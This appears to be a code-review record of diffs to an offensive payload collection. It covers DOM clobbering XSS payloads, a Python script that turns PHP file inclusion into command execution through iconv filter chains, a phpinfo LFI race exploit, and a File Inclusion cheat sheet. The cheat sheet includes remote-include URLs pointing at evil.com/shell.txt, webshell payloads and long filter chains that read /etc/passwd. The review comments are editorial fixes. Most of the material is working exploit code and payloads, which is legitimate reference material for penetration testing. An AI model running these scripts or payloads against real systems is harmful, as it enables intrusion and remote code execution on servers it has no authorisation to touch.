alert(x.password)//Clobbered-password
</script>
```
* Clobbering (Firefox only)
```html
// Payload
<base href=a:abc><a id=x href="Firefox<>">
// Sink
<script>
alert(x)//Firefox<>
</script>
```
* Clobbering (Chrome only)
```html
// Payload
<base href="a://Clobbered<>"><a id=x name=x><a id=x name=xyz href=123>
// Sink
<script>
alert(x.xyz)//a://Clobbered<>
</script>
```
## Tricks
* DomPurify allows the protocol `cid:`, which doesn't encode double quote (`"`): `<a id=defaultAvatar><a id=defaultAvatar name=avatar href="cid:&quot;onerror=alert(1)//">`
## References
* [Dom Clobbering - PortSwigger](https://portswigger.net/web-security/dom-based/dom-clobbering)
* [Dom Clobbering - HackTricks](https://book.hacktricks.xyz/pentesting-web/xss-cross-site-scripting/dom-clobbering)
* [DOM Clobbering strikes back - @garethheyes - 06 February 2020](https://portswigger.net/research/dom-clobbering-strikes-back)
* [Hijacking service workers via DOM Clobbering - @garethheyes - 29 November 2022](https://portswigger.net/research/hijacking-service-workers-via-dom-clobbering)
* [Bypassing CSP via DOM clobbering - @garethheyes - 05 June 2023](https://portswigger.net/research/bypassing-csp-via-dom-clobbering)
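Review bot: the `// Payload` and `// Sink` markers inside the ```html blocks use JavaScript comment syntax, not HTML; pasted into a page they render as visible text, so use `<!-- Payload -->` / `<!-- Sink -->` or move the markers outside the fence. Also `//clobbbered` on the `getElementById` sink has a typo, and the `x.username` example's comment says `Clobbered-password` while the `href` carries `Clobbered-Password`.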

@@ -0,0 +1,60 @@
import requests
url = "http://localhost:8000/chall.php"
file_to_use = "/etc/passwd"
command = "id"
#<?=`$_GET[0]`;;?>
base64_payload = "PD89YCRfR0VUWzBdYDs7Pz4"
conversions = {
'R': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.MAC.UCS2',
'B': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.CP1256.UCS2',
'C': 'convert.iconv.UTF8.CSISO2022KR',
'8': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L6.UCS2',
'9': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.ISO6937.JOHAB',
'f': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L7.SHIFTJISX0213',
's': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L3.T.61',
'z': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L7.NAPLPS',
'U': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.CP1133.IBM932',
'P': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.857.SHIFTJISX0213',
'V': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.851.BIG5',
'0': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.1046.UCS2',
'Y': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.ISO-IR-111.UCS2',
'W': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.851.UTF8|convert.iconv.L7.UCS2',
'd': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.ISO-IR-111.UJIS|convert.iconv.852.UCS2',
'D': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.SJIS.GBK|convert.iconv.L10.UCS2',
'7': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.EUCTW|convert.iconv.L4.UTF8|convert.iconv.866.UCS2',
'4': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.EUCTW|convert.iconv.L4.UTF8|convert.iconv.IEC_P271.UCS2'
}
# generate some garbage base64
filters = "convert.iconv.UTF8.CSISO2022KR|"
filters += "convert.base64-encode|"
# make sure to get rid of any equal signs in both the string we just generated and the rest of the file
filters += "convert.iconv.UTF8.UTF7|"
for c in base64_payload[::-1]:
filters += conversions[c] + "|"
# decode and reencode to get rid of everything that isn't valid base64
filters += "convert.base64-decode|"
filters += "convert.base64-encode|"
# get rid of equal signs
filters += "convert.iconv.UTF8.UTF7|"
filters += "convert.base64-decode"
final_payload = f"php://filter/{filters}/resource={file_to_use}"
with open('payload', 'w') as f:
f.write(final_payload)
r = requests.get(url, params={
"0": command,
"action": "include",
"file": final_payload
})
print(r.text)
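Review bot: `conversions` only contains the characters that occur in this particular `base64_payload`, so editing the payload to carry a different PHP snippet raises `KeyError` in the `for c in base64_payload[::-1]` loop for any character missing from the table; either ship the full table or guard the lookup with a clear error message. The script also writes `final_payload` to a file named `payload` that nothing reads, and `url`, `file_to_use` and `command` are hard-coded with no argument parsing, so a short header comment saying which values to edit would help.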

@@ -1,7 +1,9 @@
#!/usr/bin/python #!/usr/bin/python
# https://www.insomniasec.com/downloads/publications/LFI%20With%20PHPInfo%20Assistance.pdf # https://www.insomniasec.com/downloads/publications/LFI%20With%20PHPInfo%20Assistance.pdf
# The following line is not required but supposedly optimizes code.
# However, this breaks on some Python 2 installations, where the future module version installed is > 0.16. This can be a pain to revert.
# from builtins import range
from __future__ import print_function from __future__ import print_function
from builtins import range
import sys import sys
import threading import threading
import socket import socket
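Review bot: the new comment says `from builtins import range` "supposedly optimizes code"; that import comes from the `future` compatibility package and exists to give Python 2 the Python 3 `range` semantics, not for performance, so the comment should say that (and that the script runs without it on Python 3).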
@@ -51,6 +53,8 @@ def phpInfoLFI(host, port, phpinforeq, offset, lfireq, tag):
d += s.recv(offset) d += s.recv(offset)
try: try:
i = d.index("[tmp_name] =>") i = d.index("[tmp_name] =>")
if i == -1:
i = d.index("[tmp_name] =&gt;")
fn = d[i+17:i+31] fn = d[i+17:i+31]
except ValueError: except ValueError:
return None return None
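Review bot: the added `if i == -1:` fallback after `i = d.index("[tmp_name] =>")` is dead code: `str.index` raises `ValueError` instead of returning -1, so the `[tmp_name] =&gt;` variant is never tried and the existing `except ValueError: return None` fires first. Use `d.find(...)` here, as the `getOffset` change further down does, or catch the `ValueError` around the first lookup before trying the escaped form.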
@@ -109,6 +113,8 @@ def getOffset(host, port, phpinforeq):
break break
s.close() s.close()
i = d.find("[tmp_name] =>") i = d.find("[tmp_name] =>")
if i == -1:
i = d.find("[tmp_name] =&gt;")
if i == -1: if i == -1:
raise ValueError("No php tmp_name in phpinfo output") raise ValueError("No php tmp_name in phpinfo output")
@@ -191,4 +197,4 @@ def main():
if __name__=="__main__": if __name__=="__main__":
print("Don't forget to modify the LFI URL") print("Don't forget to modify the LFI URL")
main() main()

@@ -1 +0,0 @@
71

@@ -1,42 +1,65 @@
# File Inclusion # File Inclusion
> The File Inclusion vulnerability allows an attacker to include a file, usually exploiting a "dynamic file inclusion" mechanisms implemented in the target application. > A File Inclusion Vulnerability refers to a type of security vulnerability in web applications, particularly prevalent in applications developed in PHP, where an attacker can include a file, usually exploiting a lack of proper input/output sanitization. This vulnerability can lead to a range of malicious activities, including code execution, data theft, and website defacement.
> The Path Traversal vulnerability allows an attacker to access a file, usually exploiting a "reading" mechanism implemented in the target application **File Inclusion Vulnerability** should be differenciated from **Path Traversal**. The Path Traversal vulnerability allows an attacker to access a file, usually exploiting a "reading" mechanism implemented in the target application, when the File Inclusion will lead to the execution of arbitrary code.
## Summary ## Summary
* [Tools](#tools) - [File Inclusion](#file-inclusion)
* [Basic LFI](#basic-lfi) - [Summary](#summary)
* [Null byte](#null-byte) - [Tools](#tools)
* [Double encoding](#double-encoding) - [Local File Inclusion](#local-file-inclusion)
* [UTF-8 encoding](#utf-8-encoding) - [Null byte](#null-byte)
* [Path and dot truncation](#path-and-dot-truncation) - [Double encoding](#double-encoding)
* [Filter bypass tricks](#filter-bypass-tricks) - [UTF-8 encoding](#utf-8-encoding)
* [Basic RFI](#basic-rfi) - [Path and dot truncation](#path-and-dot-truncation)
* [LFI / RFI using wrappers](#lfi--rfi-using-wrappers) - [Filter bypass tricks](#filter-bypass-tricks)
* [Wrapper php://filter](#wrapper-phpfilter) - [Remote File Inclusion](#remote-file-inclusion)
* [Wrapper zip://](#wrapper-zip) - [Null byte](#null-byte-1)
* [Wrapper data://](#wrapper-data) - [Double encoding](#double-encoding-1)
* [Wrapper expect://](#wrapper-expect) - [Bypass allow_url_include](#bypass-allow_url_include)
* [Wrapper input://](#wrapper-input) - [LFI / RFI using wrappers](#lfi--rfi-using-wrappers)
* [Wrapper phar://](#wrapper-phar) - [Wrapper php://filter](#wrapper-phpfilter)
* [LFI to RCE via /proc/*/fd](#lfi-to-rce-via-procfd) - [Wrapper data://](#wrapper-data)
* [LFI to RCE via /proc/self/environ](#lfi-to-rce-via-procselfenviron) - [Wrapper expect://](#wrapper-expect)
* [LFI to RCE via upload](#lfi-to-rce-via-upload) - [Wrapper input://](#wrapper-input)
* [LFI to RCE via upload (race)](#lfi-to-rce-via-upload-race) - [Wrapper zip://](#wrapper-zip)
* [LFI to RCE via phpinfo()](#lfi-to-rce-via-phpinfo) - [Wrapper phar://](#wrapper-phar)
* [LFI to RCE via controlled log file](#lfi-to-rce-via-controlled-log-file) - [Wrapper convert.iconv:// and dechunk://](#wrapper-converticonv-and-dechunk)
* [LFI to RCE via PHP sessions](#lfi-to-rce-via-php-sessions) - [LFI to RCE via /proc/*/fd](#lfi-to-rce-via-procfd)
* [LFI to RCE via credentials files](#lfi-o-rce-via-credentials-files) - [LFI to RCE via /proc/self/environ](#lfi-to-rce-via-procselfenviron)
- [LFI to RCE via upload](#lfi-to-rce-via-upload)
- [LFI to RCE via upload (race)](#lfi-to-rce-via-upload-race)
- [LFI to RCE via upload (FindFirstFile)](#lfi-to-rce-via-upload-findfirstfile)
- [LFI to RCE via phpinfo()](#lfi-to-rce-via-phpinfo)
- [LFI to RCE via controlled log file](#lfi-to-rce-via-controlled-log-file)
- [RCE via SSH](#rce-via-ssh)
- [RCE via Mail](#rce-via-mail)
- [RCE via Apache logs](#rce-via-apache-logs)
- [LFI to RCE via PHP sessions](#lfi-to-rce-via-php-sessions)
- [LFI to RCE via PHP PEARCMD](#lfi-to-rce-via-php-pearcmd)
- [LFI to RCE via credentials files](#lfi-to-rce-via-credentials-files)
- [References](#references)
## Tools ## Tools
* [Kadimus - https://github.com/P0cL4bs/Kadimus](https://github.com/P0cL4bs/Kadimus) * [Kadimus - https://github.com/P0cL4bs/Kadimus](https://github.com/P0cL4bs/Kadimus)
* [LFISuite - https://github.com/D35m0nd142/LFISuite](https://github.com/D35m0nd142/LFISuite) * [LFISuite - https://github.com/D35m0nd142/LFISuite](https://github.com/D35m0nd142/LFISuite)
* [fimap - https://github.com/kurobeats/fimap](https://github.com/kurobeats/fimap) * [fimap - https://github.com/kurobeats/fimap](https://github.com/kurobeats/fimap)
* [panoptic - https://github.com/lightos/Panoptic](https://github.com/lightos/Panoptic)
## Basic LFI
## Local File Inclusion
Consider a PHP script that includes a file based on user input. If proper sanitization is not in place, an attacker could manipulate the `page` parameter to include local or remote files, leading to unauthorized access or code execution.
```php
<?php
$file = $_GET['page'];
include($file);
?>
```
In the following examples we include the `/etc/passwd` file, check the `Directory & Path Traversal` chapter for more interesting files. In the following examples we include the `/etc/passwd` file, check the `Directory & Path Traversal` chapter for more interesting files.
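Review bot: the new vulnerable snippet under Local File Inclusion (`$file = $_GET['page']; include($file);`) is shown without its fix; one sentence after it (resolve `page` against an allowlist of known page names, or `basename()` it and prefix a fixed directory, never hand the raw parameter to `include`) would give readers the remediation that the intro sentence only alludes to. The summary also quietly repairs the dead anchor `#lfi-o-rce-via-credentials-files` to `#lfi-to-rce-via-credentials-files`; good, but the duplicated sentence on the last line ("check the `Directory & Path Traversal` chapter for more interesting files") is a comma splice and should be split in two.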
@@ -46,7 +69,7 @@ http://example.com/index.php?page=../../../etc/passwd
### Null byte ### Null byte
:warning: In versions of PHP below 5.3 we can terminate with null byte. :warning: In versions of PHP below 5.3.4 we can terminate with null byte.
```powershell ```powershell
http://example.com/index.php?page=../../../etc/passwd%00 http://example.com/index.php?page=../../../etc/passwd%00
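Review bot: the bump from 5.3 to 5.3.4 in the null-byte warning is the right correction (5.3.4 is the release that made paths containing NUL invalid), but the fenced URL block is tagged `powershell`; a neutral tag such as `text` fits a list of URLs better and this applies to most fences in the file.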
@@ -68,7 +91,7 @@ http://example.com/index.php?page=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/pas
### Path and dot truncation ### Path and dot truncation
On most PHP installations a filename longer than 4096 bytes will be cut off so any excess chars will be thrown away. On most PHP installations a filename longer than `4096` bytes will be cut off so any excess chars will be thrown away.
```powershell ```powershell
http://example.com/index.php?page=../../../etc/passwd............[ADD MORE] http://example.com/index.php?page=../../../etc/passwd............[ADD MORE]
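Review bot: wrapping `4096` in backticks is fine, but unlike the null-byte section this one still carries no PHP-version caveat; path/dot truncation is an old-PHP behaviour and the section should state which versions it applies to, otherwise readers will try it against current releases. The `[ADD MORE]` placeholder would also read better as an explicit requirement (the whole path must exceed 4096 bytes).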
@@ -85,7 +108,17 @@ http://example.com/index.php?page=..///////..////..//////etc/passwd
http://example.com/index.php?page=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd http://example.com/index.php?page=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd
``` ```
## Basic RFI
## Remote File Inclusion
> Remote File Inclusion (RFI) is a type of vulnerability that occurs when an application includes a remote file, usually through user input, without properly validating or sanitizing the input.
Remote File Inclusion doesn't work anymore on a default configuration since `allow_url_include` is now disabled since PHP5.
```ini
allow_url_include = On
```
Most of the filter bypasses from LFI section can be reused for RFI. Most of the filter bypasses from LFI section can be reused for RFI.
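Review bot: "is now disabled since PHP5" in the new RFI paragraph is both imprecise and ungrammatical; `allow_url_include` appeared in PHP 5.2.0 with a default of Off (and is deprecated since 7.4), so write "has been Off by default since PHP 5.2.0". The `ini` block also needs a lead-in saying it shows the non-default setting a target would have to carry for RFI to work at all; as it stands the bare `allow_url_include = On` reads like a recommendation.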
@@ -99,12 +132,14 @@ http://example.com/index.php?page=http://evil.com/shell.txt
http://example.com/index.php?page=http://evil.com/shell.txt%00 http://example.com/index.php?page=http://evil.com/shell.txt%00
``` ```
### Double encoding ### Double encoding
```powershell ```powershell
http://example.com/index.php?page=http:%252f%252fevil.com%252fshell.txt http://example.com/index.php?page=http:%252f%252fevil.com%252fshell.txt
``` ```
### Bypass allow_url_include ### Bypass allow_url_include
When `allow_url_include` and `allow_url_fopen` are set to `Off`. It is still possible to include a remote file on Windows box using the `smb` protocol. When `allow_url_include` and `allow_url_fopen` are set to `Off`. It is still possible to include a remote file on Windows box using the `smb` protocol.
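Review bot: "When `allow_url_include` and `allow_url_fopen` are set to `Off`. It is still possible to include a remote file on Windows box using the `smb` protocol." is a sentence fragment followed by a run-on; join with a comma and write "on a Windows box". The sentence also presents the SMB include as unconditional; stating which PHP/Windows combinations it was observed on would help.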
@@ -118,37 +153,47 @@ When `allow_url_include` and `allow_url_fopen` are set to `Off`. It is still pos
### Wrapper php://filter ### Wrapper php://filter
The part "php://filter" is case insensitive The part "`php://filter`" is case insensitive
```powershell ```powershell
http://example.com/index.php?page=php://filter/read=string.rot13/resource=index.php http://example.com/index.php?page=php://filter/read=string.rot13/resource=index.php
http://example.com/index.php?page=php://filter/convert.iconv.utf-8.utf-16/resource=index.php
http://example.com/index.php?page=php://filter/convert.base64-encode/resource=index.php http://example.com/index.php?page=php://filter/convert.base64-encode/resource=index.php
http://example.com/index.php?page=pHp://FilTer/convert.base64-encode/resource=index.php http://example.com/index.php?page=pHp://FilTer/convert.base64-encode/resource=index.php
``` ```
can be chained with a compression wrapper for large files. Wrappers can be chained with a compression wrapper for large files.
```powershell ```powershell
http://example.com/index.php?page=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd http://example.com/index.php?page=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd
``` ```
NOTE: Wrappers can be chained multiple times : `php://filter/convert.base64-decode|convert.base64-decode|convert.base64-decode/resource=%s` NOTE: Wrappers can be chained multiple times using `|` or `/`:
- Multiple base64 decodes: `php://filter/convert.base64-decoder|convert.base64-decode|convert.base64-decode/resource=%s`
- deflate then `base64encode` (useful for limited character exfil): `php://filter/zlib.deflate/convert.base64-encode/resource=/var/www/html/index.php`
```powershell ```powershell
./kadimus -u "http://example.com/index.php?page=vuln" -S -f "index.php%00" -O index.php --parameter page ./kadimus -u "http://example.com/index.php?page=vuln" -S -f "index.php%00" -O index.php --parameter page
curl "http://example.com/index.php?page=php://filter/convert.base64-encode/resource=index.php" | base64 -d > index.php curl "http://example.com/index.php?page=php://filter/convert.base64-encode/resource=index.php" | base64 -d > index.php
``` ```
### Wrapper zip:// Also there is a way to turn the `php://filter` into a full RCE.
```python * [synacktiv/php_filter_chain_generator](https://github.com/synacktiv/php_filter_chain_generator) - A CLI to generate PHP filters chain
echo "<pre><?php system($_GET['cmd']); ?></pre>" > payload.php; ```powershell
zip payload.zip payload.php; $ python3 php_filter_chain_generator.py --chain '<?php phpinfo();?>'
mv payload.zip shell.jpg; [+] The following gadget chain will generate the following code : <?php phpinfo();?> (base64 value: PD9waHAgcGhwaW5mbygpOz8+)
rm payload.php php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16|convert.iconv.UCS-2.UTF8|convert.iconv.L6.UTF8|convert.iconv.L4.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.ISO2022KR.UTF16|convert.iconv.L6.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.865.UTF16|convert.iconv.CP901.ISO6937|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSA_T500.UTF-32|convert.iconv.CP857.ISO-2022-JP-3|convert.iconv.ISO2022JP2.CP775|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.IBM891.CSUNICODE|convert.iconv.ISO8859-14.ISO6937|convert.iconv.BIG-FIVE.UCS-4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.iconv.IBM-932.UTF-8|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.851.UTF-16|convert.iconv.L1.T.618BIT|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.iconv.UCS-2.OSF00030010|convert.iconv.CSIBM1008.UTF32BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.CP1163.CSA_T500|convert.iconv.UCS-2.MSCP949|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.8859_3.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP1046.UTF32|convert.iconv.L6.UCS-2|convert.iconv.UTF-16LE.T.61-8BIT|convert.iconv.865.UCS-4LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.i
conv.MAC.UTF16|convert.iconv.L8.UTF16BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSGB2312.UTF-32|convert.iconv.IBM-1161.IBM932|convert.iconv.GB13000.UTF16BE|convert.iconv.864.UTF-32LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L4.UTF32|convert.iconv.CP1250.UCS-2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.iconv.IBM-932.UTF-8|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.8859_3.UTF16|convert.iconv.863.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP1046.UTF16|convert.iconv.ISO6937.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP1046.UTF32|convert.iconv.L6.UCS-2|convert.iconv.UTF-16LE.T.61-8BIT|convert.iconv.865.UCS-4LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.MAC.UTF16|convert.iconv.L8.UTF16BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSIBM1161.UNICODE|convert.iconv.ISO-IR-156.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.IBM932.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.base64-decode/resource=php://temp
```
* [LFI2RCE.py](./LFI2RCE.py) to generate a custom payload.
```powershell
# vulnerable file: index.php
# vulnerable parameter: file
# executed command: id
# executed PHP code: <?=`$_GET[0]`;;?>
curl "127.0.0.1:8000/index.php?0=id&file=php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.EUCTW|convert.iconv.L4.UTF8|convert.iconv.IEC_P271.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L7.NAPLPS|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.857.SHIFTJISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.EUCTW|convert.iconv.L4.UTF8|convert.iconv.866.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L3.T.61|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.SJIS.GBK|convert.iconv.L10.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.ISO-IR-111.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.ISO-IR-111.UJIS|convert.iconv.852.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.CP1256.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L7.NAPLPS|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UT
F8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.851.UTF8|convert.iconv.L7.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.CP1133.IBM932|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.851.BIG5|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.1046.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.MAC.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L7.SHIFTJISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.MAC.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.ISO-IR-111.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.ISO6937.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L6.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.SJIS.GBK|convert.iconv.L10.UCS2|convert.base64-decode|convert.base64-encode|convert.i
conv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.857.SHIFTJISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.base64-decode/resource=/etc/passwd"
```
http://example.com/index.php?page=zip://shell.jpg%23payload.php
```
### Wrapper data:// ### Wrapper data://
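Review bot: the rewritten chaining note introduces a typo: `convert.base64-decoder` is not a PHP filter name, the filter is `convert.base64-decode` (the line it replaces had it right), so the "Multiple base64 decodes" chain will fail on an unknown filter. The next bullet's "`base64encode`" should likewise read `convert.base64-encode`, and the `[LFI2RCE.py](./LFI2RCE.py)` link is relative, so the script must land in the same directory as this README in the same change or the link is dead.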
@@ -159,6 +204,7 @@ NOTE: the payload is "<?php system($_GET['cmd']);echo 'Shell done !'; ?>"
Fun fact: you can trigger an XSS and bypass the Chrome Auditor with : `http://example.com/index.php?page=data:application/x-httpd-php;base64,PHN2ZyBvbmxvYWQ9YWxlcnQoMSk+` Fun fact: you can trigger an XSS and bypass the Chrome Auditor with : `http://example.com/index.php?page=data:application/x-httpd-php;base64,PHN2ZyBvbmxvYWQ9YWxlcnQoMSk+`
### Wrapper expect:// ### Wrapper expect://
```powershell ```powershell
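Review bot: the "Fun fact" line about bypassing the Chrome Auditor is stale: Chrome removed the XSS Auditor in version 78 (2019), so the `data://` example still serves as an LFI-to-XSS demonstration but the bypass claim should be dropped or dated.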
@@ -166,6 +212,7 @@ http://example.com/index.php?page=expect://id
http://example.com/index.php?page=expect://ls http://example.com/index.php?page=expect://ls
``` ```
### Wrapper input:// ### Wrapper input://
Specify your payload in the POST parameters, this can be done with a simple `curl` command. Specify your payload in the POST parameters, this can be done with a simple `curl` command.
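Review bot: the `expect://` examples should state that this wrapper is not built into PHP; it requires the PECL expect extension, so on a stock build the include simply fails and a reader seeing no output cannot tell "not vulnerable" from "extension absent".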
@@ -180,6 +227,18 @@ Alternatively, Kadimus has a module to automate this attack.
